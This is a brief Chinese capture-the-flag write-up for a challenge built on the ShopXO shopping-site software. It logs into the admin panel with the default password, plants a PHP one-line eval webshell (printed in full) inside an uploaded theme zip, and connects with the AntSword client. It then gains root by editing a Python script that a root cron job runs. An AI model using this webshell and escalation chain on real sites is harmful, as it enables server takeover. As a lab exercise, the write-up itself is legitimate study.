老八小超市
网页是个购物网站模板,后台是admin.php
查询得知ShopXO默认密码为shopxo
登陆进入后台,查找主题模板,并下载免费的默认模板
在模板压缩包的_static_目录下,插入一句话木马并上传
<?php
@eval($_POST[a]);
phpinfo();
?>
上传以后会自动安装
WP里面给了相关文章告诉我们文件路径,这里查看主页上的头像也能知道文件的位置
之后我们构造url访问,执行了phpinfo()
使用蚁剑连接,查看flag,提示flag位置
但是我们没有访问那个文件的权限
之后查看红色的auto.sh文件,发现每隔60秒执行python文件
查看python文件,发现有修改权限,且有root的执行权限,能每60秒刷新hint文件。
学大佬修改python文件,读取flag并写入hint文件
查看得flag
PS:题目崩了一次,连接崩了几次,做到头疼